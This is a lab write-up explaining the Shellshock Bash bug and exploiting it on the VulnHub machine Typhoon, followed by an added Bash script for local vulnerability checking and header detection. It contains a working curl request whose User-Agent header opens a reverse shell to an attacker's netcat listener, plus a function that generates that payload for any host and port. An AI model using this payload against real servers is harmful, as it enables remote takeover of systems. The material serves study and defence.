By way of background, cgi-bin is the directory in which a web server keeps its CGI (Common Gateway Interface) scripts: programs the server executes on a request, with the request's headers exported to them as environment variables, and whose output is returned to the browser.
Shellshock (CVE-2014-6271) is a bug in Bash 1.0.3 through 4.3: when Bash imports a function definition from an environment variable, it also executes any commands that follow the function body. An attacker who controls such a variable, for instance through a request header that a CGI server exports before running a Bash script, can therefore run arbitrary commands as the web server user. The vulnerability is trivial to exploit.
The test command below was run against the vulnerable machine Typhoon: https://www.vulnhub.com/entry/typhoon-102,267
> The Shellshock vulnerability was detected via a Nikto scan.
> Start the listener first with netcat on the attacker machine to catch the reverse shell:
nc -lvp 4433
> Send the request with curl:
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.28.164/4433 0>&1' http://192.168.28.175/cgi-bin/test.sh
The first address (192.168.28.164) is the attacker's, where the listener runs; the second (192.168.28.175) is the victim's. Note that /dev/tcp is a Bash built-in redirection rather than a real device, so the payload only works because the CGI script is executed by Bash.
The web server stores the User-Agent header in the environment variable HTTP_USER_AGENT before executing the CGI script. A vulnerable Bash parses the leading "() { :; };" as a function definition and then executes the command appended after it, which is what makes Shellshock exploitable here:
The request therefore opens a reverse shell from the target back to the local listener, giving control of the target through Bash.
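The following script, added here as an example and not part of the original writeup, reproduces the path the curl request takes locally: it maps a header name to its CGI variable name, hands the header to a Bash script through the environment the way the web server does, and reports whether the installed Bash is vulnerable. It also builds the User-Agent value used above for an assumed listener address and port, and includes a defender-side check that flags a header carrying the Shellshock function prefix. Nothing in it touches the network; a harmless marker stands in for the reverse shell so the result is visible.

```bash
#!/usr/bin/env bash
# Added example (not from the original post). A CGI server exports each
# request header as an HTTP_<NAME> environment variable (RFC 3875) before
# running the script under /cgi-bin/. If that script is run by a vulnerable
# Bash, any variable whose value starts with "() {" is imported as a function
# and the commands after the closing brace run at import time.

# Map an HTTP header name to its CGI variable name: User-Agent -> HTTP_USER_AGENT
cgi_var_name() {
    printf 'HTTP_%s' "$(printf '%s' "$1" | tr 'a-z' 'A-Z' | tr '-' '_')"
}

# Build the header value sent in the curl request for a listener at $1:$2
# (assumed attacker address and port; any reachable host and port work).
shellshock_payload() {
    printf '() { :; }; /bin/bash -i >& /dev/tcp/%s/%s 0>&1' "$1" "$2"
}

# Simulate the server: pass one header to a Bash "CGI script" through the
# environment, exactly as the web server would, and return the script's output.
run_cgi_with_header() {
    local name=$1 value=$2
    env "$(cgi_var_name "$name")=$value" bash -c 'echo "cgi script ran"' 2>/dev/null
}

# Report whether the local Bash is vulnerable: "vulnerable" if the command
# smuggled after the function body was executed on import, "patched" otherwise.
shellshock_status() {
    local out
    out=$(run_cgi_with_header 'User-Agent' '() { :; }; echo SHELLSHOCK_MARKER')
    case "$out" in
        *SHELLSHOCK_MARKER*) echo vulnerable ;;
        *) echo patched ;;
    esac
}

# Defender side: succeed (exit 0) when a header value starts with the
# "() {" function prefix that every Shellshock probe needs.
is_shellshock_header() {
    printf '%s' "$1" | grep -Eq '^[[:space:]]*\(\)[[:space:]]*\{'
}

# Usage when run directly:
#   shellshock_status                          -> vulnerable | patched
#   shellshock_payload 192.168.28.164 4433     -> the User-Agent value from the curl request
```

Run it with `bash script.sh` after adding a call such as `shellshock_status` at the end; a patched Bash (anything after the 4.3 fixes) prints "patched", while the marker only appears on a vulnerable build. The defender check is deliberately narrow: it matches the function prefix a probe must carry, not any particular payload after it, which is the same reason Shellshock cannot be blocked by filtering one command string.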